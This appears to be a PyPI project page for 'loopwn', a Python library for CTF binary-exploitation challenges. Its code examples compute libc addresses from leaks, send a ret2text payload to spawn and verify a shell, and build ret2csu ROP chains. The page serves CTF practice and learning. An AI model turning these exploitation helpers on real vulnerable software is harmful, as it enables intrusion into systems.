A CTF pwn helper library for easy libc address calculation and exploitation
Project description
loopwn
A Python library designed to assist with CTF Pwn challenges, specifically focusing on Libc address calculation and leak exploitation.
Installation
pip install loopwn
Usage
1. Looplibc - Libc Address Calculation
from loopwn import Looplibc
# Example 1: Initialize with a known base address
libc = Looplibc('./libc.so.6', 0x7ffff7a0d000)
# Example 2: Initialize with a leaked symbol address
# This will automatically calculate the base address
libc = Looplibc('./libc.so.6', 'puts', 0x7ffff7a8c5a0)
# Access addresses
print(hex(libc.system))
print(hex(libc.bin_sh))
2. loop2text - Auto Ret2text Exploitation
from pwn import *
from loopwn import loop2text
# Start process
io = process('./pwn')
# Exploit
# Automatically sends payload and verifies shell with an echo check
# Args: padding_length, backdoor_address, io_object
loop2text(112, 0x401186, io)
3. loopcsu - Auto Ret2CSU Payload Generation
from loopwn import loopcsu
# Gadget addresses (Usually found in __libc_csu_init)
# csu_end: pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
# csu_start: mov rdx, r15; mov rsi, r14; mov edi, r13d; call qword ptr [r12+rbx*8]
csu_end = 0x4011da
csu_start = 0x4011c0
# Generate payload
# Args: csu_end, csu_start, r12, r13, r14, r15, return_addr, padding=0
payload = loopcsu(
csu_end, csu_start,
r12=0x601018, # Function pointer (e.g., GOT address)
r13=0, # Arg1 (EDI)
r14=1, # Arg2 (RSI)
r15=2, # Arg3 (RDX)
return_addr=0x401120,
padding=0x20
)
# Send payload
io.sendline(payload)
Features
- Automatic Base Calculation: Easily calculate libc base address from a leaked symbol.
- Quick Access: Get
systemand/bin/shaddresses via properties. - Auto Ret2Text: Generate payload and get shell in one line with
loop2text. - Auto Ret2CSU: Simplify Ret2CSU payload construction with
loopcsu. - Shell Verification: Automatically checks if shell is obtained.
- Pwntools Integration: Inherits from
pwntools'sELFclass.
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
loopwn-0.3.4.tar.gz
(7.8 kB
view details)
Built Distribution
Filter files by name, interpreter, ABI, and platform.
If you're not sure about the file name format, learn more about wheel file names.
Copy a direct link to the current filters
File details
Details for the file loopwn-0.3.4.tar.gz.
File metadata
- Download URL: loopwn-0.3.4.tar.gz
- Upload date:
- Size: 7.8 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
c42bda8a10389dfd7cc8b7ca23044a84408690d60e2f28ab6bdf22057fbac35d
|
|
| MD5 |
356cd03c7c9094d497d722a78fe55d67
|
|
| BLAKE2b-256 |
98578e05a16368e806e4431ae77c3a9e8e3378a94038038008ccd947ab34546f
|
File details
Details for the file loopwn-0.3.4-py3-none-any.whl.
File metadata
- Download URL: loopwn-0.3.4-py3-none-any.whl
- Upload date:
- Size: 8.8 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: twine/6.2.0 CPython/3.13.9
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 |
904f9e03f98e53fae7a748ebfeb1fba542e9d62d1a1a7ace95a4fbc799a80851
|
|
| MD5 |
cedaaaaccb58c7d64118159f2f2d3bad
|
|
| BLAKE2b-256 |
7c45506ee793a31a91fd0964834a6b6fc2eae037ecbd15d3a3c5e0d4770a5a7a
|
